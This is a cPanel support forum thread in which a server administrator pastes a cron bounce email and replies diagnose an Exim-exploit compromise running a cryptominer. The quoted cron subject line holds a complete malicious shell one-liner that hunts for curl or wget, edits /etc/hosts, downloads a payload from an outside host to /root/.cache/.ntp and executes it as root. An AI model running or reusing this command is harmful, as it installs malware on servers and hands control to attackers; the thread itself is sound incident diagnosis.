Mail delivery failed: returning message to sender


May 8, 2013
cPanel Access Level
Root Administrator
Hi .

I upgraded my cpanel after the Exim exploit and ever since then i have been getting emails in queue that contains the following .

Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

[email protected]
root cannot accept local mail deliveries

Content-type: message/delivery-status

Reporting-MTA: dns;

Action: failed
Final-Recipient: rfc822;[email protected]
Status: 5.0.0

Content-type: text/rfc822-headers

Return-path: <[email protected]>
Received: from root by with local (Exim 4.92)
(envelope-from <[email protected]>)
id 1hepQP-00074l-Uw
for [email protected]; Sat, 22 Jun 2019 23:28:02 +0000
From: [email protected] (Cron Daemon)
To: [email protected]
Subject: Cron <[email protected]> tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <[email protected]>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i "onion.\|\|tor2web"|wc -l) -ne 0 ]; then echo " localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --connect-timeout 26 --max-time 75 -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 -o /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
Content-Type: text/plain; charset=ANSI_X3.4-1968
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <[email protected]>
Date: Sat, 22 Jun 2019 23:28:01 +0000
X-Exim-DSN-Information: Due to administrative limits only headers are returned

How can i fix this . i am getting mails every 2 minute.


Last edited by a moderator:


Get Proactive!
Apr 8, 2003
Chesapeake, VA
cPanel Access Level
DataCenter Provider
It looks to me like your hostname is not a fqdn . Go to whm and reset your hostname. This is a common problem with openvz vms which I'd bet is what you have.

Only your host can fix the issue with the changing hostname every time you boot..


Well-Known Member
May 20, 2003
cPanel Access Level
Root Administrator
Checking google for just a snip of your post:
/root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/
...and I found this link. Worth looking at this closer I think.
What does this entry in my server's crontab do?
In short, your server has been hacked and hackers are running a crypto miner on it. This is bad.
I've edited your post above to remove the URLs in it. They were very similar to the URLs mentioned at that link.

If you're unsure what to do here, you might want to look into hiring someone that can help you with this:
System Administration Services | cPanel Forums


Product Owner
Staff member
Nov 14, 2017
1. the error here:

[email protected]
root cannot accept local mail deliveries

Indicates that you've not set the address for root's mail to be forwarded to in WHM>>Server Contacts>>Edit System Mail Preferences.

2. And by far the most important:

That cron output is associated with the exim compromise. If you'd like for us to investigate to identify if your server is root compromised we would be happy to. I also want to point out that there is no safe way to clean a root level compromise, if it is found that you have been affected (which I am almost certain you have) you will need to migrate. We also offer migrations for this.

If you'd like cPanel's support to assist you can open a ticket using the link in my signature. Once open please reply with the Ticket ID here so that we can update this thread with the resolution once the ticket is resolved.